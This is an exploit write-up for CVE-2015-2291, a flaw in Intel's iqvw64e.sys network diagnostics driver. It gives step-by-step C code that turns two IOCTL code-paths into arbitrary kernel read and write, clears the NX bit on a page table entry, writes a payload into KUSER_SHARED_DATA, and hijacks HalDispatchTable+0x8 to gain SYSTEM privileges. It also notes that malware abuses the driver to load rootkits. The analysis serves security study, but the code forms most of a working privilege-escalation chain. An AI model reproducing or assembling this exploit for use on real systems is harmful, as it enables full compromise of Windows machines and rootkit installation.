CVE-2015-2291

(1) IQVW32.sys before 1.3.1.0 and (2) IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allows local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call.

Overview

This repository contains a write-up of the vulnerability in question, along with proof-of-concept exploits functional on 64-bit Windows 7 SP1 and Windows 10 20H2. The driver file can be located in the Driver Files directory. If you discover any typos throughout the write-up/paper, or if you would like to see certain details with a more elaborate description, please create an issue on the repository! I will fix them as soon as possible.

Motivation

The motivation behind writing an exploit for this device driver in particular is solely because it is currently being abused in the wild to load an attacker's unsigned root-kit. Using the BYOVD (Bring Your Own Vulnerable Driver) method, malware can check if it is running with elevated privileges, drop a copy of the vulnerable device driver, load the driver, and subsequently exploit it to gain kernel code execution to load the root-kit. I was unable to successfully reverse engineer the malware sample, so I took it upon myself to create the exploit.

Samples spotted in the wild:
https://bazaar.abuse.ch/sample/84ed7fec67de5621806dbb43af5167a5fc60ab7f2403448519dc0eca2b8f9022/
https://bazaar.abuse.ch/sample/0925b8985b19d7925d68186d666b0050a4cb3f2a577d64765d770a57a2eab9ae/
https://bazaar.abuse.ch/sample/e8b7f42d544fe8b954c4021315cff2fdd44d67d11704009cdf3037d34e0c0a93/

CVE-2015-2291 - An Exploit's Technical Analysis

The device driver, namely iqvw64e.sys, is designed to perform network adapter diagnostics. It allows a user-mode component to invoke a plethora of kernel routines by exposing a few IO control codes (also known as IOCTLs), with a "sub" IO control code provided in the user's input buffer during the interaction. The IO control code that will be used to hit the vulnerable code-path is 0x80862007. In addition to the primary control code, the "sub" IO control codes covered in this analysis are 0x33, which reaches the memmove function call, and 0x30, which reaches the memset function call. This write-up will not cover the DriverEntry routine, as Microsoft's documentation already explains it thoroughly.

To start, we want to know how we can interact with this particular device driver in the first place. The most common means of communicating with a device driver is through the usage of a function named DeviceIoControl. The general idea behind this function is that we can pass a valid driver handle created by CreateFileA, pass in an IO control code that corresponds to the kernel routine we want, pass in a structure (or buffer) that it is expecting, and it will return data in our output buffer. While routines like these can be at times necessary (e.g. accessing model-specific registers for overclocking purposes), they also pose a serious risk to security. But... how?

In the case of CVE-2015-2291, the vulnerability can be triggered by an unprivileged user. Because there are no sanitization checks present, and administrator privileges are not required to exploit the vulnerability, this poses a security risk. What lies underneath these two flaws is the ability to fully control the memset and memmove function calls exposed by the IO control code interface. Remember the DeviceIoControl function from before, and how we are able to pass in a structure that will be used in a kernel routine? This is how it all comes together.

Let's take a step back. We first want to obtain a handle to the vulnerable device driver. Even before this, though, we need to locate the corresponding named device object. These objects are exposed to user-space by a symbolic link (commonly hard-coded), which can be found using WinObj, part of the Sysinternals suite. While we could use a string dumping utility to dump the symbolic link, or alternatively reverse engineer the device driver, I simply loaded the device driver and located it using WinObj. The symbolic link found to be in relation to the device driver is \\.\GLOBALROOT\Device\Nal. To obtain the driver handle, we need to call the CreateFileA function and have it return a valid driver handle for us to use later in the process. The code that checks the returned handle is as follows:

if (h_nal == (HANDLE)-1)
{
	printf("\n[-] Unable to obtain a driver handle to the Nal device driver. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 1;
}
printf("\n[+] Obtained a driver handle to the Nal device driver. Handle Value: 0x%p", h_nal);

We will be using the driver handle later in the exploitation process. For now, we will begin the preparation of our exploit. The next step would be to load the ntdll.dll library using the LoadLibraryA function to return a module handle, so we can dynamically locate the functions we need. While the ntdll.dll library may already be loaded into our process, we nonetheless need to obtain a handle to the library that we can use. The functions that we need for exploitation are NtQuerySystemInformation to leak the base address of the NT Kernel (with medium process integrity) for later in the exploitation process, and the NtQueryIntervalProfile function to trigger the vulnerability. As for the code to load the ntdll.dll library, it is as follows:

h_ntdll = LoadLibraryA("C:\\Windows\\System32\\ntdll.dll");
if (!h_ntdll)
{
	printf("\n[-] Failed to load the \"ntdll.dll\" API library. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 0;
}
printf("\n[+] Loaded the \"ntdll.dll\" API library. Handle Value: 0x%p", h_ntdll);

Now that we have obtained a handle to the library, we will start off by locating the NtQueryIntervalProfile function. To start, we will need a type definition for this function, as it is undocumented. While you can find the type definition online, I have provided it here for easier access:

typedef unsigned int(__stdcall* NtQueryIntervalProfile)(
	unsigned int      ProfileSource,
	PULONG            Interval
	);

To use this function, we will also need to declare a variable (local or global, up to you) using the NtQueryIntervalProfile type. Now, how do we turn this variable into an actual function? To do this, we will be using a function named GetProcAddress. By passing in a handle to the module we want to search (the first parameter) and passing in the name of the function (the second parameter), we can locate any function we want in the module and retrieve a pointer to that function! Code is provided to help you process this information.

_NtQueryIntervalProfile = (NtQueryIntervalProfile)GetProcAddress(h_ntdll, "NtQueryIntervalProfile");
if (!_NtQueryIntervalProfile)
{
	printf("\n[-] Failed to locate the \"NtQueryIntervalProfile\" function. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 1;
}
printf("\n[+] Located the \"NtQueryIntervalProfile\" function. Function Address: 0x%p", _NtQueryIntervalProfile);

Dynamically resolved functions can be called this way because a function's name in C evaluates to the address of its executable code. GetProcAddress returns that same address, so once it is cast to the matching function pointer type, calling through the pointer executes the function's body.
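The idea of resolving a routine by name and calling it through a typed pointer can be sketched in portable C. This is only an illustration: the table, the resolve helper, and the two arithmetic functions are hypothetical stand-ins for a module's export table and GetProcAddress, and none of them appear in the exploit.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical signature, standing in for a routine without a public prototype. */
typedef int (*binary_op)(int, int);

static int add_ints(int a, int b) { return a + b; }
static int mul_ints(int a, int b) { return a * b; }

/* Hypothetical name-to-address table, playing the role of an export table. */
struct export_entry {
    const char *name;
    binary_op   fn;
};

static const struct export_entry exports[] = {
    { "add_ints", add_ints },
    { "mul_ints", mul_ints },
};

/* Returns the address registered under `name`, or NULL when nothing matches,
   which mirrors how a failed lookup is reported by GetProcAddress. */
static binary_op resolve(const char *name)
{
    for (size_t i = 0; i < sizeof(exports) / sizeof(exports[0]); i++) {
        if (strcmp(exports[i].name, name) == 0)
            return exports[i].fn;
    }
    return NULL;
}
```

A caller stores the result in a binary_op variable, checks it against NULL, and then invokes it like any other function, which is the same shape as the _NtQueryIntervalProfile code above.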

Now that we have resolved the NtQueryIntervalProfile function pointer, we still need to retrieve the address of the NtQuerySystemInformation function. As before, we need a type definition for this function, and we also need to declare a variable through which to call it. I have again provided the type definition for ease of access.

typedef NTSTATUS(WINAPI* NtQuerySystemInformation)(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength
	);

And, as before, we need to locate the function. The only difference between the previous call to GetProcAddress and this one is the function we are searching for. We can copy the earlier call and change the second parameter to search for our second function. After the code is written, we should have something similar to this:

_NtQuerySystemInformation = (NtQuerySystemInformation)GetProcAddress(h_ntdll, "NtQuerySystemInformation");
if (!_NtQuerySystemInformation)
{
	printf("\n[-] Failed to locate the \"NtQuerySystemInformation\" function. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 0;
}
printf("\n[+] Located the \"NtQuerySystemInformation\" function. Function Address: 0x%p", _NtQuerySystemInformation);

Perfect! We have located all of the functions that we had to resolve at run-time. Now, we need to leak the NT Kernel base address. With the help of NtQuerySystemInformation, we can create a query that returns the base addresses and other information for all of the currently loaded device drivers. The first parameter of the NtQuerySystemInformation function is an enum value, specifically one that is not publicly documented: SystemModuleInformation, which has a value of 0xB. The second parameter is a pointer to the buffer that will receive the returned structures. The necessary structures and enums are provided below, courtesy of FuzzySecurity (@b33f):

typedef enum _SYSTEM_INFORMATION_CLASS {
	SystemModuleInformation = 0xB,
} SYSTEM_INFORMATION_CLASS;

typedef struct SYSTEM_MODULE {
	ULONG                Reserved1;
	ULONG                Reserved2;
	ULONG				 Reserved3;
	PVOID                ImageBaseAddress;
	ULONG                ImageSize;
	ULONG                Flags;
	WORD                 Id;
	WORD                 Rank;
	WORD                 LoadCount;
	WORD                 NameOffset;
	CHAR                 Name[256];
} SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
	ULONG                ModulesCount;
	SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
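One detail of these definitions is easy to miss: the three ULONG reserved fields only occupy 12 bytes, so on a 64-bit build the compiler inserts 4 bytes of padding and ImageBaseAddress lands at offset 16. The sketch below mirrors the layout with fixed-width types so that the offsets can be checked on any 64-bit compiler. The type and field names are hypothetical, and it is an assumption here that this layout matches what the kernel writes on 64-bit Windows.

```c
#include <stddef.h>
#include <stdint.h>

/* Portable mirror of the SYSTEM_MODULE layout above (hypothetical names). */
typedef struct {
    uint32_t reserved1;
    uint32_t reserved2;
    uint32_t reserved3;
    void    *image_base;    /* 64-bit builds pad 4 bytes before this field */
    uint32_t image_size;
    uint32_t flags;
    uint16_t id;
    uint16_t rank;
    uint16_t load_count;
    uint16_t name_offset;
    char     name[256];
} module_entry;

/* Portable mirror of SYSTEM_MODULE_INFORMATION (hypothetical names). */
typedef struct {
    uint32_t     count;
    module_entry modules[1];
} module_list;

/* Number of bytes needed for a list that holds `count` entries. */
static size_t module_list_size(uint32_t count)
{
    return offsetof(module_list, modules) + (size_t)count * sizeof(module_entry);
}
```

On a 32-bit build the same definition would place the pointer at offset 12, so the structure should not be reused there without checking it first.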

But wait, there is more to it! We will need to specify the size of the structure to allocate. Because the size of the structure varies depending on the number of device drivers to retrieve information about, we need to call this function twice; the first function call will be to retrieve the expected size of the structure, and the second function call will be to retrieve information and store it into our structure. To retrieve the size, use the aforementioned SystemModuleInformation enum for the first parameter, pass a pointer to a variable that will store the size of the structure, and pass in 0 (or NULL) for the rest of the left-over parameters. The code should look like this:

_NtQuerySystemInformation(SystemModuleInformation, 0, 0, &return_length);

Easy enough! We have successfully retrieved the size of the expected structure. Now, we need to allocate memory for the variable that will store the information. Using a function named VirtualAlloc, we can allocate virtual memory at an address we provide, with any size we want, with our own set of protections, and receive a pointer to this memory. For our purposes, we do not need to allocate this memory at a fixed address, so we will pass in 0 to allow the memory manager to choose a location for us. The block must be as large as the size returned by NtQuerySystemInformation, which is why we had to store the value. As for the allocation type and the protection parameters, simply use the generic arguments shown in the code below.

module_info = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(0, return_length, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

Now that we have allocated memory for the returned structure, we can query the system module information and retrieve a structure containing information on every loaded device driver. To do this, we can reuse our function call to NtQuerySystemInformation from before, and pass in a pointer to the structure (second parameter) and the size of the structure (third parameter). Now, do you have something like this?

status = _NtQuerySystemInformation(SystemModuleInformation, module_info, return_length, &return_length);
if (status)
{
	printf("\n[-] Failed to query system module information. NTSTATUS: %d (0x%x)", status, status);
	unused = getchar();
	return 0;
}
printf("\n[+] Queried system module information.");

Well, I would hope you have something similar. All we have left to do to leak the NT Kernel base address is to query our structure! You do not have to compare strings against the driver's name in this case, as the NT Kernel driver information is always at index 0 in this structure. To retrieve the base address of a driver, simply print, store, or return the value of the ImageBaseAddress structure field. It is also good practice to ensure that the pointer is not NULL prior to using it.

if (module_info)
{
	printf("\n[+] Leaked the NT kernel base address. Kernel Base Address: 0x%p", module_info->Modules[0].ImageBaseAddress);
	return (unsigned long long)module_info->Modules[0].ImageBaseAddress;
}

printf("\n[-] Failed to leak the NT kernel base address.");
unused = getchar();
return 0;

We have successfully returned the kernel base address. Now, there is one more step before we begin the exploitation process of this vulnerability. We need to create a QWORD (a 64-bit integer) pointer that will receive the leaked PTE (page table entry) base address, and allocate memory for it using VirtualAlloc. The PTEs will be covered later in this paper.

As demonstrated earlier, we will use VirtualAlloc to allocate memory and return a pointer to the block of memory. The code used in my exploit is shown below:

pte_address = (long long*)VirtualAlloc(0, 8, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!pte_address)
{
	printf("\n[-] Failed to allocate memory for the leaked page table entry base address pointer. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 1;
}
printf("\n[+] Allocated memory for the leaked page table entry base address pointer. Memory Address: 0x%p", (long long*)pte_address);

Now that the last step of the set up process is finished, let's begin the exploitation process!

As mentioned in the earlier parts of the paper, the IO control code that we want to use is IOCTL 0x80862007. But, how do we pass in the "sub" IOCTLs?

A pointer to the user-land input that we pass to the device driver is stored in the rcx register. As the corresponding figure shows, the driver simply dereferences the first QWORD of the structure that we pass in, and then performs a switch-case on the value obtained.

Scrolling through the decompiled pseudo-code, we find two routines that allow us to control all three arguments of memset and memmove respectively. By passing in a value of 0x30 as the first QWORD in the structure, we can hit the memset code-path. Alternatively, by passing in a value of 0x33 as the first QWORD in the structure, we hit the memmove code-path instead. These two code-paths are depicted below respectively.

From looking at the input buffer's offsets used, we were able to create structures for both of these functions to pass in, for easier reading. Take note that there is a QWORD field that is being used as padding. While we will not set its value to anything, we need this field in order for our structure definition to be correct. Additionally, take note of the parameters used in the calls to these routines. During the reverse engineering process, we learned that the parameters passed in are in the correct order with their respective function definitions. Figures indicating this have also been provided below. The memset code-path input structure:

typedef struct _MEMSET_INPUT_BUFFER
{
	unsigned long long JumpTableCode;	// Offset: 0x0 (0)
	unsigned long long Padding1;		// Offset: 0x8 (8)
	unsigned long long Value;		// Offset: 0x10 (16)
	unsigned long long Destination;		// Offset: 0x18 (24)
	unsigned long long Length;		// Offset: 0x20 (32)
} MEMSET_INPUT_BUFFER, * PMEMSET_INPUT_BUFFER;

The memmove code-path input structure:

typedef struct _MEMMOVE_INPUT_BUFFER
{
	unsigned long long JumpTableCode;	// Offset: 0x0 (0)
	unsigned long long Padding1;		// Offset: 0x8 (8)
	unsigned long long* Source;		// Offset: 0x10 (16)
	unsigned long long* Destination;	// Offset: 0x18 (24)
	unsigned long long Length;		// Offset: 0x20 (32)
} MEMMOVE_INPUT_BUFFER, * PMEMMOVE_INPUT_BUFFER;
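Since the driver reads its arguments at fixed offsets, it can help to have the compiler confirm that a structure definition really places each field where the comments say it does. The following is a minimal sketch using fixed-width types; the type name and the init_memset_request helper are hypothetical and only mirror the memset structure above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Portable mirror of the memset input buffer above (hypothetical names). */
typedef struct {
    uint64_t jump_table_code;   /* 0x00: selects the code-path */
    uint64_t padding1;          /* 0x08: unused, kept so later offsets line up */
    uint64_t value;             /* 0x10 */
    uint64_t destination;       /* 0x18 */
    uint64_t length;            /* 0x20 */
} memset_request;

/* Compilation fails if the layout ever drifts from the documented offsets. */
_Static_assert(offsetof(memset_request, jump_table_code) == 0x00, "code offset");
_Static_assert(offsetof(memset_request, padding1) == 0x08, "padding offset");
_Static_assert(offsetof(memset_request, value) == 0x10, "value offset");
_Static_assert(offsetof(memset_request, destination) == 0x18, "destination offset");
_Static_assert(offsetof(memset_request, length) == 0x20, "length offset");
_Static_assert(sizeof(memset_request) == 0x28, "total size");

/* Zeroes the request, including the padding field, then fills in the fields. */
static void init_memset_request(memset_request *req, uint64_t value,
                                uint64_t destination, uint64_t length)
{
    memset(req, 0, sizeof(*req));
    req->jump_table_code = 0x30;    /* memset code-path, per the text above */
    req->value = value;
    req->destination = destination;
    req->length = length;
}
```

Zeroing the whole structure first is a design choice rather than a requirement stated in the write-up; it simply keeps the padding field from carrying stale data.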

After quick analysis, it was safe to assume that these will provide us with an arbitrary kernel read and write exploit primitive. This is perfect for exploitation on Windows 10, as we do not need to convert any exploit primitives to arbitrary reads and writes, and thus allows us to exploit this vulnerability with ease.

To begin, we will be using our memmove exploit primitive to read the value stored at nt!MiGetPteAddress+0x13. At this offset, the function's machine code embeds the base address of the PTE region as an immediate operand, and this base is randomized on recent builds of Windows 10. Combined with the other operations that can be done in our exploit, we can calculate the address of any PTE! Remember the pte_address variable that we created earlier? Or, do you remember the leaking of the NT Kernel base address? All of the exploit preparation discussed previously made this possible. The code for calculating the address of the PTE that maps our target page is depicted below. Take note of the KUSER_SHARED_DATA address, as in Windows 10 20H2, this was one of the last few regions of memory left in the kernel that was not affected by kernel ASLR (Address Space Layout Randomization).

unsigned long long kuser_shared_data_loc = 0xFFFFF78000000050;
current_pte_address = kuser_shared_data_loc >> 9;
current_pte_address &= 0x7FFFFFFFF8;

memmove_input_struct.JumpTableCode = 0x33;
memmove_input_struct.Source = (unsigned long long*)(nt_base_address + MI_GET_PTE_ADDRESS_PLUS_0X13_OFFSET);
memmove_input_struct.Destination = (unsigned long long*)pte_address;
memmove_input_struct.Length = 0x8;

DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
current_pte_address += *pte_address;
printf("\n[+] Calculated page table entry address. Page Table Entry Address: 0x%p", (unsigned long long*)current_pte_address);
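The shift and mask in this calculation can be read as "divide the virtual address by the 4 KB page size, then multiply by the 8-byte size of a PTE", which collapses into a single right shift by 9 followed by a mask that keeps the result 8-byte aligned. A minimal sketch of the arithmetic on its own is shown below; the function name is hypothetical, and the PTE base is passed in as a parameter because its real value has to be leaked at run-time.

```c
#include <stdint.h>

/* Returns the address of the PTE that maps `virtual_address`, given the base
   of the PTE region. The mask keeps the 36-bit page number scaled by 8. */
static uint64_t pte_address_for(uint64_t virtual_address, uint64_t pte_base)
{
    uint64_t offset = (virtual_address >> 9) & 0x7FFFFFFFF8ULL;
    return pte_base + offset;
}
```

As a sample input only, the fixed base 0xFFFFF68000000000 used by older Windows builds gives 0xFFFFF6FBC0000000 for 0xFFFFF78000000050. The 0x50 offset inside the page does not change the result, because every address within one page shares the same PTE.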

Now that we have calculated the address of our target page's PTE, we want to dereference this address and retrieve the bits that the page table entry is using. We will need this data shortly to make this region of memory executable in addition to readable and writable. We change the source address in our structure to point to the PTE address, and change the destination field to point to a stack variable that stores the retrieved bits, leaving every other field in the input structure untouched.

unsigned long long current_pte_contents = 0;

memmove_input_struct.Source = (unsigned long long*)current_pte_address;
memmove_input_struct.Destination = &current_pte_contents;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Dereferenced page table entry address. Page Table Entry Bits: 0x%llx", current_pte_contents);

Now that we have the bit contents of the actual PTE, we want to mark it as executable without flipping other bits on or off. To do so, we clear the highest bit (bit 63) in the retrieved value, which is the NX (no execute) bit. We can use a bitwise AND operation on the stored value with the mask 0x7FFFFFFFFFFFFFFF to accomplish this task; a wider mask such as 0x0FFFFFFFFFFFFFFF would also clear bits 60 through 62. We will then trigger a write to the kernel address using our arbitrary write primitive, to overwrite the value stored at the PTE's address. As for our structure, we will modify the source field to point to our stored bits, and change the destination to point back to the PTE address. This is essentially the reverse of reading the PTE's contents. This is demonstrated with the code snippet below.

current_pte_contents &= 0x7FFFFFFFFFFFFFFF;
memmove_input_struct.Source = &current_pte_contents;
memmove_input_struct.Destination = (unsigned long long*)current_pte_address;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Marked the page table entry as executable. New Page Table Entry Bits: 0x%llx", current_pte_contents);
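Because the goal is to change exactly one bit, it is worth being explicit about which mask does that. The sketch below isolates the bit arithmetic; the macro and function names are hypothetical. A mask with only bit 63 cleared leaves every other bit alone, whereas a mask whose whole top nibble is zero also clears bits 60 through 62.

```c
#include <stdint.h>

/* Bit 63 of an x86-64 page table entry is the NX (no execute) bit. */
#define PTE_NX_BIT (1ULL << 63)

/* Returns nonzero when the entry is marked no-execute. */
static int is_nx_set(uint64_t pte)
{
    return (pte & PTE_NX_BIT) != 0;
}

/* Clears only the NX bit and preserves all other bits of the entry. */
static uint64_t clear_nx(uint64_t pte)
{
    return pte & ~PTE_NX_BIT;
}
```

For a made-up entry value of 0xF000000000000063, clear_nx returns 0x7000000000000063, while AND'ing with 0x0FFFFFFFFFFFFFFF returns 0x0000000000000063.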

Before we continue, we want to verify that the PTE's contents were overwritten. If the bit overwrite fails, executing the payload will crash the machine (with a KERNEL_SECURITY_CHECK_FAILURE or equivalent bug check). To verify this, we will be using the !pte command in WinDbg to confirm our overwrite worked as intended.

Upon examination of the PTE bits, we can see that the NX-bit is no longer present! This means that the KUSER_SHARED_DATA region of memory is now executable. While we are dealing with this region of memory, it only makes sense to place the kernel payload somewhere here. After performing analysis of the chunk of memory, we learned that the memory at an offset of 0x50 from the base of the KUSER_SHARED_DATA region is unused and zero-filled. This is the perfect location to place our payload!

Remember our memset write primitive from earlier? Using this primitive, we can iterate through all of the bytes in our kernel payload, and write every individual byte to this region of memory using memset. While it is possible to use memmove to write the payload to this location, we wanted an excuse to use both primitives, to demonstrate how one or the other can be abused, especially under full control. We will be using the 0x30 jump code to hit the memset code-path, with a length of 0x1 bytes to be written. The destination will have to be incremented by one to point to the next byte of freed memory, along with the offset of our kernel payload. This process can be demonstrated with the provided for loop below.

for (int i = 0; i < sizeof(shellcode); i++)
{
	memset_input_struct.Destination = kuser_shared_data_loc + i;
	memset_input_struct.Value = shellcode[i];
	DeviceIoControl(h_nal, TARGET_IOCTL, &memset_input_struct, sizeof(memset_input_struct), &output, sizeof(output), &bytes_returned, 0);
}
printf("\n[+] Wrote kernel payload at address 0x%llx.", kuser_shared_data_loc);
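The same byte-at-a-time pattern can be tried out safely in user mode, where the standard memset plays the role of the driver's routine. This is only an analogy under that assumption: the function name is hypothetical and nothing here talks to a driver.

```c
#include <stddef.h>
#include <string.h>

/* Copies `len` bytes from `src` to `dst` using one single-byte memset per
   byte, which shows that a fill primitive can reproduce arbitrary data. */
static void copy_with_single_byte_memset(unsigned char *dst,
                                         const unsigned char *src,
                                         size_t len)
{
    for (size_t i = 0; i < len; i++)
        memset(dst + i, src[i], 1);
}
```

The cost is one call per byte, which is why a copy primitive is normally the better fit when one is available.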

While triggering a vulnerability numerous times is a risk for crashing the machine, this is an exception, due to the overall stability of the device driver and its (mis)used routines. For our next step, we want to retrieve the original function pointer stored at nt!HalDispatchTable+0x8. This retrieved function pointer will be used in the recovery step, and will prevent our machine from randomly crashing due to accessing an incorrect function pointer. While this step is not too important on Windows 7, as our payload execution function is not called frequently, its usage has increased in the later builds of Windows 10. As always, we will store the returned pointer to a local variable on our stack by abusing our read primitive once more! We will also be using our leaked NT Kernel base address once again, this time pairing it with an offset to the nt!HalDispatchTable with an additional offset of 0x8.

memmove_input_struct.Source = (unsigned long long*)(nt_base_address + HAL_DISPATCH_TABLE_PLUS_0X8_OFFSET);
memmove_input_struct.Destination = &recovery_address;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Retrieved the recovery address. Recovery Address: 0x%llx", recovery_address);

Just a couple more steps to go! After we have successfully stored the original pointer from the dispatch table, it is now time to overwrite the same pointer with our KUSER_SHARED_DATA+0x50 address, which translates to 0xFFFFF78000000050. At this point, everything is ready to go, and we are ready to root the system! Simply set the destination field to what was formerly the source (the nt!HalDispatchTable+0x8 address), and pass a pointer to our local variable containing the payload address for the source field.

memmove_input_struct.Destination = (unsigned long long*)(nt_base_address + HAL_DISPATCH_TABLE_PLUS_0X8_OFFSET);
memmove_input_struct.Source = &kuser_shared_data_loc;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Overwrote an arbitrary kernel function pointer located in the \"HalDispatchTable+0x8\" function table.\n[!] Executing kernel payload...");
_NtQueryIntervalProfile(2, &interval);

The NtQueryIntervalProfile function is known for using pointers from the HAL dispatch table, specifically the one at offset 0x8, and it is commonly abused for this reason. With the ability to arbitrarily write to kernel memory, this is one of the easiest exploitation techniques there is! At this point in our exploit, we have nt authority\system privileges, but we want to do just one last step before spawning our beautiful shell: clean-up and recovery.

This will be bundled into one step, as they are both simple. We will be using both arbitrary write primitives one last time. To start, we will begin by removing all of our shellcode from kernel space. This is an easy task, as we can use the same for loop to iterate through the length of our payload. This time, we will be overwriting the memory with zeros instead, exactly how it was prior to our exploit execution.

for (int i = 0; i < sizeof(shellcode); i++)
{
	memset_input_struct.Destination = kuser_shared_data_loc + i;
	memset_input_struct.Value = 0;
	DeviceIoControl(h_nal, TARGET_IOCTL, &memset_input_struct, sizeof(memset_input_struct), &output, sizeof(output), &bytes_returned, 0);
}
printf("\n[+] Removed the kernel payload from kernel memory.");

I do not believe I have to explain the for loop iterations any further. The last step in the recovery process (and exploitation process in general) is to restore the original function pointer at nt!HalDispatchTable+0x8. Using our memmove structure data that was originally used to overwrite one of the many pointers in nt!HalDispatchTable, all we have to do is modify the source field to pass a pointer to the original address. As before, I do not believe I need to explain this part any further ($1 if you can count how many times I have repeated myself!).

memmove_input_struct.Source = &recovery_address;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Restored the original function pointer.");

And now, you get to have your fun. Spawn that system shell!

Figure: Proof of nt authority\system privileges

Overall, this was a very fun bug to exploit. The exploitation process was not as complicated as I was thinking it would have been. It also allowed me to get more comfortable with PTE manipulations, and allowed me to create my first ever local privilege escalation exploit that is not abusing HackSys Extreme Vulnerable Driver! I hope to see you guys around soon.

Credits

HackSys Team; Creating the HackSys Extreme Vulnerable Driver for me to practice on
Connor McGarr; Creating an excellent paper on manipulating page table entries
Fuzzy Security; Creating the first kernel exploitation tutorials I ever read
The Offensive Security Discord; Providing me with assistance and tips throughout learning, and providing an amazing community to talk to
The Security Community (as a whole); Providing me with the motivation I needed to keep going
